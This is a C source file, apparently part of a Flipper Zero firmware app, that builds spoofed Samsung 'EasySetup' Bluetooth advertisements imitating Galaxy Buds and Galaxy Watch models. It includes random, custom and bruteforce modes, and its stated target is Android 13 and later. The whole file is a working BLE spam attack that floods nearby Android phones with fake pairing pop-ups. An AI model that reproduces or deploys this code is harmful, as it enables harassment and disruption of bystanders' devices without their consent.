easysetup.c 19 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574
  1. #include "easysetup.h"
  2. #include "_protocols.h"
  3. // Hacked together by @Willy-JL and @Spooks4576
  4. // Research by @Spooks4576
  5. const struct {
  6. uint32_t value;
  7. const char* name;
  8. } buds_models[] = {
  9. {0xEE7A0C, "Fallback Buds"},
  10. {0x9D1700, "Fallback Dots"},
  11. {0x39EA48, "Light Purple Buds2"},
  12. {0xA7C62C, "Bluish Silver Buds2"},
  13. {0x850116, "Black Buds Live"},
  14. {0x3D8F41, "Gray & Black Buds2"},
  15. {0x3B6D02, "Bluish Chrome Buds2"},
  16. {0xAE063C, "Gray Beige Buds2"},
  17. {0xB8B905, "Pure White Buds"},
  18. {0xEAAA17, "Pure White Buds2"},
  19. {0xD30704, "Black Buds"},
  20. {0x9DB006, "French Flag Buds"},
  21. {0x101F1A, "Dark Purple Buds Live"},
  22. {0x859608, "Dark Blue Buds"},
  23. {0x8E4503, "Pink Buds"},
  24. {0x2C6740, "White & Black Buds2"},
  25. {0x3F6718, "Bronze Buds Live"},
  26. {0x42C519, "Red Buds Live"},
  27. {0xAE073A, "Black & White Buds2"},
  28. {0x011716, "Sleek Black Buds2"},
  29. };
  30. const uint8_t buds_models_count = COUNT_OF(buds_models);
  31. const struct {
  32. uint8_t value;
  33. const char* name;
  34. } watch_models[] = {
  35. {0x1A, "Fallback Watch"},
  36. {0x01, "White Watch4 Classic 44m"},
  37. {0x02, "Black Watch4 Classic 40m"},
  38. {0x03, "White Watch4 Classic 40m"},
  39. {0x04, "Black Watch4 44mm"},
  40. {0x05, "Silver Watch4 44mm"},
  41. {0x06, "Green Watch4 44mm"},
  42. {0x07, "Black Watch4 40mm"},
  43. {0x08, "White Watch4 40mm"},
  44. {0x09, "Gold Watch4 40mm"},
  45. {0x0A, "French Watch4"},
  46. {0x0B, "French Watch4 Classic"},
  47. {0x0C, "Fox Watch5 44mm"},
  48. {0x11, "Black Watch5 44mm"},
  49. {0x12, "Sapphire Watch5 44mm"},
  50. {0x13, "Purpleish Watch5 40mm"},
  51. {0x14, "Gold Watch5 40mm"},
  52. {0x15, "Black Watch5 Pro 45mm"},
  53. {0x16, "Gray Watch5 Pro 45mm"},
  54. {0x17, "White Watch5 44mm"},
  55. {0x18, "White & Black Watch5"},
  56. {0x1B, "Black Watch6 Pink 40mm"},
  57. {0x1C, "Gold Watch6 Gold 40mm"},
  58. {0x1D, "Silver Watch6 Cyan 44mm"},
  59. {0x1E, "Black Watch6 Classic 43m"},
  60. {0x20, "Green Watch6 Classic 43m"},
  61. };
  62. const uint8_t watch_models_count = COUNT_OF(watch_models);
  63. static const char* type_names[EasysetupTypeCOUNT] = {
  64. [EasysetupTypeBuds] = "EasySetup Buds",
  65. [EasysetupTypeWatch] = "EasySetup Watch",
  66. };
  67. static const char* get_name(const Payload* payload) {
  68. const EasysetupCfg* cfg = &payload->cfg.easysetup;
  69. return type_names[cfg->type];
  70. }
  71. static uint8_t packet_sizes[EasysetupTypeCOUNT] = {
  72. [EasysetupTypeBuds] = 31,
  73. [EasysetupTypeWatch] = 15,
  74. };
  75. void make_packet(uint8_t* out_size, uint8_t** out_packet, Payload* payload) {
  76. EasysetupCfg* cfg = payload ? &payload->cfg.easysetup : NULL;
  77. EasysetupType type;
  78. if(cfg && cfg->type != 0x00) {
  79. type = cfg->type;
  80. } else {
  81. const EasysetupType types[] = {
  82. EasysetupTypeBuds,
  83. EasysetupTypeWatch,
  84. };
  85. type = types[rand() % COUNT_OF(types)];
  86. }
  87. uint8_t size = packet_sizes[type];
  88. uint8_t* packet = malloc(size);
  89. uint8_t i = 0;
  90. switch(type) {
  91. case EasysetupTypeBuds: {
  92. uint32_t model;
  93. switch(cfg ? payload->mode : PayloadModeRandom) {
  94. case PayloadModeRandom:
  95. default:
  96. model = buds_models[rand() % buds_models_count].value;
  97. break;
  98. case PayloadModeValue:
  99. model = cfg->data.buds.model;
  100. break;
  101. case PayloadModeBruteforce:
  102. model = cfg->data.buds.model = payload->bruteforce.value;
  103. break;
  104. }
  105. packet[i++] = 27; // Size
  106. packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
  107. packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
  108. packet[i++] = 0x00; // ...
  109. packet[i++] = 0x42;
  110. packet[i++] = 0x09;
  111. packet[i++] = 0x81;
  112. packet[i++] = 0x02;
  113. packet[i++] = 0x14;
  114. packet[i++] = 0x15;
  115. packet[i++] = 0x03;
  116. packet[i++] = 0x21;
  117. packet[i++] = 0x01;
  118. packet[i++] = 0x09;
  119. packet[i++] = (model >> 0x10) & 0xFF; // Buds Model / Color (?)
  120. packet[i++] = (model >> 0x08) & 0xFF; // ...
  121. packet[i++] = 0x01; // ... (Always static?)
  122. packet[i++] = (model >> 0x00) & 0xFF; // ...
  123. packet[i++] = 0x06;
  124. packet[i++] = 0x3C;
  125. packet[i++] = 0x94;
  126. packet[i++] = 0x8E;
  127. packet[i++] = 0x00;
  128. packet[i++] = 0x00;
  129. packet[i++] = 0x00;
  130. packet[i++] = 0x00;
  131. packet[i++] = 0xC7;
  132. packet[i++] = 0x00;
  133. packet[i++] = 16; // Size
  134. packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
  135. packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
  136. // Truncated AD segment, Android seems to fill in the rest with zeros
  137. break;
  138. }
  139. case EasysetupTypeWatch: {
  140. uint8_t model;
  141. switch(cfg ? payload->mode : PayloadModeRandom) {
  142. case PayloadModeRandom:
  143. default:
  144. model = watch_models[rand() % watch_models_count].value;
  145. break;
  146. case PayloadModeValue:
  147. model = cfg->data.watch.model;
  148. break;
  149. case PayloadModeBruteforce:
  150. model = cfg->data.watch.model = payload->bruteforce.value;
  151. break;
  152. }
  153. packet[i++] = 14; // Size
  154. packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
  155. packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
  156. packet[i++] = 0x00; // ...
  157. packet[i++] = 0x01;
  158. packet[i++] = 0x00;
  159. packet[i++] = 0x02;
  160. packet[i++] = 0x00;
  161. packet[i++] = 0x01;
  162. packet[i++] = 0x01;
  163. packet[i++] = 0xFF;
  164. packet[i++] = 0x00;
  165. packet[i++] = 0x00;
  166. packet[i++] = 0x43;
  167. packet[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?)
  168. break;
  169. }
  170. default:
  171. break;
  172. }
  173. *out_size = size;
  174. *out_packet = packet;
  175. }
  176. enum {
  177. _ConfigBudsExtraStart = ConfigExtraStart,
  178. ConfigBudsModel,
  179. ConfigBudsInfoVersion,
  180. ConfigBudsCOUNT,
  181. };
  182. enum {
  183. _ConfigWatchExtraStart = ConfigExtraStart,
  184. ConfigWatchModel,
  185. ConfigWatchCOUNT,
  186. };
  187. static void config_callback(void* _ctx, uint32_t index) {
  188. Ctx* ctx = _ctx;
  189. Payload* payload = &ctx->attack->payload;
  190. EasysetupCfg* cfg = &payload->cfg.easysetup;
  191. scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
  192. switch(cfg->type) {
  193. case EasysetupTypeBuds: {
  194. switch(index) {
  195. case ConfigBudsModel:
  196. scene_manager_next_scene(ctx->scene_manager, SceneEasysetupBudsModel);
  197. break;
  198. case ConfigBudsInfoVersion:
  199. break;
  200. default:
  201. ctx->fallback_config_enter(ctx, index);
  202. break;
  203. }
  204. break;
  205. }
  206. case EasysetupTypeWatch: {
  207. switch(index) {
  208. case ConfigWatchModel:
  209. scene_manager_next_scene(ctx->scene_manager, SceneEasysetupWatchModel);
  210. break;
  211. default:
  212. ctx->fallback_config_enter(ctx, index);
  213. break;
  214. }
  215. break;
  216. }
  217. default:
  218. ctx->fallback_config_enter(ctx, index);
  219. break;
  220. }
  221. }
  222. static void buds_model_changed(VariableItem* item) {
  223. Payload* payload = variable_item_get_context(item);
  224. EasysetupCfg* cfg = &payload->cfg.easysetup;
  225. uint8_t index = variable_item_get_current_value_index(item);
  226. if(index) {
  227. index--;
  228. payload->mode = PayloadModeValue;
  229. cfg->data.buds.model = buds_models[index].value;
  230. variable_item_set_current_value_text(item, buds_models[index].name);
  231. } else {
  232. payload->mode = PayloadModeRandom;
  233. variable_item_set_current_value_text(item, "Random");
  234. }
  235. }
  236. static void watch_model_changed(VariableItem* item) {
  237. Payload* payload = variable_item_get_context(item);
  238. EasysetupCfg* cfg = &payload->cfg.easysetup;
  239. uint8_t index = variable_item_get_current_value_index(item);
  240. if(index) {
  241. index--;
  242. payload->mode = PayloadModeValue;
  243. cfg->data.watch.model = watch_models[index].value;
  244. variable_item_set_current_value_text(item, watch_models[index].name);
  245. } else {
  246. payload->mode = PayloadModeRandom;
  247. variable_item_set_current_value_text(item, "Random");
  248. }
  249. }
  250. static void extra_config(Ctx* ctx) {
  251. Payload* payload = &ctx->attack->payload;
  252. EasysetupCfg* cfg = &payload->cfg.easysetup;
  253. VariableItemList* list = ctx->variable_item_list;
  254. VariableItem* item;
  255. size_t value_index;
  256. switch(cfg->type) {
  257. case EasysetupTypeBuds: {
  258. item = variable_item_list_add(
  259. list, "Model Code", buds_models_count + 1, buds_model_changed, payload);
  260. const char* model_name = NULL;
  261. char model_name_buf[9];
  262. switch(payload->mode) {
  263. case PayloadModeRandom:
  264. default:
  265. model_name = "Random";
  266. value_index = 0;
  267. break;
  268. case PayloadModeValue:
  269. for(uint8_t i = 0; i < buds_models_count; i++) {
  270. if(cfg->data.buds.model == buds_models[i].value) {
  271. model_name = buds_models[i].name;
  272. value_index = i + 1;
  273. break;
  274. }
  275. }
  276. if(!model_name) {
  277. snprintf(model_name_buf, sizeof(model_name_buf), "%06lX", cfg->data.buds.model);
  278. model_name = model_name_buf;
  279. value_index = buds_models_count + 1;
  280. }
  281. break;
  282. case PayloadModeBruteforce:
  283. model_name = "Bruteforce";
  284. value_index = buds_models_count + 1;
  285. break;
  286. }
  287. variable_item_set_current_value_index(item, value_index);
  288. variable_item_set_current_value_text(item, model_name);
  289. variable_item_list_add(list, "Works on Android 13 and up", 0, NULL, NULL);
  290. break;
  291. }
  292. case EasysetupTypeWatch: {
  293. item = variable_item_list_add(
  294. list, "Model Code", watch_models_count + 1, watch_model_changed, payload);
  295. const char* model_name = NULL;
  296. char model_name_buf[3];
  297. switch(payload->mode) {
  298. case PayloadModeRandom:
  299. default:
  300. model_name = "Random";
  301. value_index = 0;
  302. break;
  303. case PayloadModeValue:
  304. for(uint8_t i = 0; i < watch_models_count; i++) {
  305. if(cfg->data.watch.model == watch_models[i].value) {
  306. model_name = watch_models[i].name;
  307. value_index = i + 1;
  308. break;
  309. }
  310. }
  311. if(!model_name) {
  312. snprintf(model_name_buf, sizeof(model_name_buf), "%02X", cfg->data.watch.model);
  313. model_name = model_name_buf;
  314. value_index = watch_models_count + 1;
  315. }
  316. break;
  317. case PayloadModeBruteforce:
  318. model_name = "Bruteforce";
  319. value_index = watch_models_count + 1;
  320. break;
  321. }
  322. variable_item_set_current_value_index(item, value_index);
  323. variable_item_set_current_value_text(item, model_name);
  324. break;
  325. }
  326. default:
  327. break;
  328. }
  329. variable_item_list_set_enter_callback(list, config_callback, ctx);
  330. }
  331. static uint8_t config_counts[EasysetupTypeCOUNT] = {
  332. [EasysetupTypeBuds] = ConfigBudsCOUNT - ConfigExtraStart - 1,
  333. [EasysetupTypeWatch] = ConfigWatchCOUNT - ConfigExtraStart - 1,
  334. };
  335. static uint8_t config_count(const Payload* payload) {
  336. const EasysetupCfg* cfg = &payload->cfg.easysetup;
  337. return config_counts[cfg->type];
  338. }
  339. const Protocol protocol_easysetup = {
  340. .icon = &I_android,
  341. .get_name = get_name,
  342. .make_packet = make_packet,
  343. .extra_config = extra_config,
  344. .config_count = config_count,
  345. };
  346. static void buds_model_callback(void* _ctx, uint32_t index) {
  347. Ctx* ctx = _ctx;
  348. Payload* payload = &ctx->attack->payload;
  349. EasysetupCfg* cfg = &payload->cfg.easysetup;
  350. switch(index) {
  351. case 0:
  352. payload->mode = PayloadModeRandom;
  353. scene_manager_previous_scene(ctx->scene_manager);
  354. break;
  355. case buds_models_count + 1:
  356. scene_manager_next_scene(ctx->scene_manager, SceneEasysetupBudsModelCustom);
  357. break;
  358. case buds_models_count + 2:
  359. payload->mode = PayloadModeBruteforce;
  360. payload->bruteforce.counter = 0;
  361. payload->bruteforce.value = cfg->data.buds.model;
  362. payload->bruteforce.size = 3;
  363. scene_manager_previous_scene(ctx->scene_manager);
  364. break;
  365. default:
  366. payload->mode = PayloadModeValue;
  367. cfg->data.buds.model = buds_models[index - 1].value;
  368. scene_manager_previous_scene(ctx->scene_manager);
  369. break;
  370. }
  371. }
  372. void scene_easysetup_buds_model_on_enter(void* _ctx) {
  373. Ctx* ctx = _ctx;
  374. Payload* payload = &ctx->attack->payload;
  375. EasysetupCfg* cfg = &payload->cfg.easysetup;
  376. Submenu* submenu = ctx->submenu;
  377. uint32_t selected = 0;
  378. submenu_reset(submenu);
  379. submenu_add_item(submenu, "Random", 0, buds_model_callback, ctx);
  380. if(payload->mode == PayloadModeRandom) {
  381. selected = 0;
  382. }
  383. bool found = false;
  384. for(uint8_t i = 0; i < buds_models_count; i++) {
  385. submenu_add_item(submenu, buds_models[i].name, i + 1, buds_model_callback, ctx);
  386. if(!found && payload->mode == PayloadModeValue &&
  387. cfg->data.buds.model == buds_models[i].value) {
  388. found = true;
  389. selected = i + 1;
  390. }
  391. }
  392. submenu_add_item(submenu, "Custom", buds_models_count + 1, buds_model_callback, ctx);
  393. if(!found && payload->mode == PayloadModeValue) {
  394. selected = buds_models_count + 1;
  395. }
  396. submenu_add_item(submenu, "Bruteforce", buds_models_count + 2, buds_model_callback, ctx);
  397. if(payload->mode == PayloadModeBruteforce) {
  398. selected = buds_models_count + 2;
  399. }
  400. submenu_set_selected_item(submenu, selected);
  401. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  402. }
  403. bool scene_easysetup_buds_model_on_event(void* _ctx, SceneManagerEvent event) {
  404. UNUSED(_ctx);
  405. UNUSED(event);
  406. return false;
  407. }
  408. void scene_easysetup_buds_model_on_exit(void* _ctx) {
  409. UNUSED(_ctx);
  410. }
  411. static void buds_model_custom_callback(void* _ctx) {
  412. Ctx* ctx = _ctx;
  413. Payload* payload = &ctx->attack->payload;
  414. EasysetupCfg* cfg = &payload->cfg.easysetup;
  415. payload->mode = PayloadModeValue;
  416. cfg->data.buds.model =
  417. (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00);
  418. scene_manager_previous_scene(ctx->scene_manager);
  419. scene_manager_previous_scene(ctx->scene_manager);
  420. }
  421. void scene_easysetup_buds_model_custom_on_enter(void* _ctx) {
  422. Ctx* ctx = _ctx;
  423. Payload* payload = &ctx->attack->payload;
  424. EasysetupCfg* cfg = &payload->cfg.easysetup;
  425. ByteInput* byte_input = ctx->byte_input;
  426. byte_input_set_header_text(byte_input, "Enter custom Model Code");
  427. ctx->byte_store[0] = (cfg->data.buds.model >> 0x10) & 0xFF;
  428. ctx->byte_store[1] = (cfg->data.buds.model >> 0x08) & 0xFF;
  429. ctx->byte_store[2] = (cfg->data.buds.model >> 0x00) & 0xFF;
  430. byte_input_set_result_callback(
  431. byte_input, buds_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 3);
  432. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  433. }
  434. bool scene_easysetup_buds_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
  435. UNUSED(_ctx);
  436. UNUSED(event);
  437. return false;
  438. }
  439. void scene_easysetup_buds_model_custom_on_exit(void* _ctx) {
  440. UNUSED(_ctx);
  441. }
  442. static void watch_model_callback(void* _ctx, uint32_t index) {
  443. Ctx* ctx = _ctx;
  444. Payload* payload = &ctx->attack->payload;
  445. EasysetupCfg* cfg = &payload->cfg.easysetup;
  446. switch(index) {
  447. case 0:
  448. payload->mode = PayloadModeRandom;
  449. scene_manager_previous_scene(ctx->scene_manager);
  450. break;
  451. case watch_models_count + 1:
  452. scene_manager_next_scene(ctx->scene_manager, SceneEasysetupWatchModelCustom);
  453. break;
  454. case watch_models_count + 2:
  455. payload->mode = PayloadModeBruteforce;
  456. payload->bruteforce.counter = 0;
  457. payload->bruteforce.value = cfg->data.watch.model;
  458. payload->bruteforce.size = 1;
  459. scene_manager_previous_scene(ctx->scene_manager);
  460. break;
  461. default:
  462. payload->mode = PayloadModeValue;
  463. cfg->data.watch.model = watch_models[index - 1].value;
  464. scene_manager_previous_scene(ctx->scene_manager);
  465. break;
  466. }
  467. }
  468. void scene_easysetup_watch_model_on_enter(void* _ctx) {
  469. Ctx* ctx = _ctx;
  470. Payload* payload = &ctx->attack->payload;
  471. EasysetupCfg* cfg = &payload->cfg.easysetup;
  472. Submenu* submenu = ctx->submenu;
  473. uint32_t selected = 0;
  474. submenu_reset(submenu);
  475. submenu_add_item(submenu, "Random", 0, watch_model_callback, ctx);
  476. if(payload->mode == PayloadModeRandom) {
  477. selected = 0;
  478. }
  479. bool found = false;
  480. for(uint8_t i = 0; i < watch_models_count; i++) {
  481. submenu_add_item(submenu, watch_models[i].name, i + 1, watch_model_callback, ctx);
  482. if(!found && payload->mode == PayloadModeValue &&
  483. cfg->data.watch.model == watch_models[i].value) {
  484. found = true;
  485. selected = i + 1;
  486. }
  487. }
  488. submenu_add_item(submenu, "Custom", watch_models_count + 1, watch_model_callback, ctx);
  489. if(!found && payload->mode == PayloadModeValue) {
  490. selected = watch_models_count + 1;
  491. }
  492. submenu_add_item(submenu, "Bruteforce", watch_models_count + 2, watch_model_callback, ctx);
  493. if(payload->mode == PayloadModeBruteforce) {
  494. selected = watch_models_count + 2;
  495. }
  496. submenu_set_selected_item(submenu, selected);
  497. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  498. }
  499. bool scene_easysetup_watch_model_on_event(void* _ctx, SceneManagerEvent event) {
  500. UNUSED(_ctx);
  501. UNUSED(event);
  502. return false;
  503. }
  504. void scene_easysetup_watch_model_on_exit(void* _ctx) {
  505. UNUSED(_ctx);
  506. }
  507. static void watch_model_custom_callback(void* _ctx) {
  508. Ctx* ctx = _ctx;
  509. Payload* payload = &ctx->attack->payload;
  510. EasysetupCfg* cfg = &payload->cfg.easysetup;
  511. payload->mode = PayloadModeValue;
  512. cfg->data.watch.model = (ctx->byte_store[0] << 0x00);
  513. scene_manager_previous_scene(ctx->scene_manager);
  514. scene_manager_previous_scene(ctx->scene_manager);
  515. }
  516. void scene_easysetup_watch_model_custom_on_enter(void* _ctx) {
  517. Ctx* ctx = _ctx;
  518. Payload* payload = &ctx->attack->payload;
  519. EasysetupCfg* cfg = &payload->cfg.easysetup;
  520. ByteInput* byte_input = ctx->byte_input;
  521. byte_input_set_header_text(byte_input, "Enter custom Model Code");
  522. ctx->byte_store[0] = (cfg->data.watch.model >> 0x00) & 0xFF;
  523. byte_input_set_result_callback(
  524. byte_input, watch_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  525. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  526. }
  527. bool scene_easysetup_watch_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
  528. UNUSED(_ctx);
  529. UNUSED(event);
  530. return false;
  531. }
  532. void scene_easysetup_watch_model_custom_on_exit(void* _ctx) {
  533. UNUSED(_ctx);
  534. }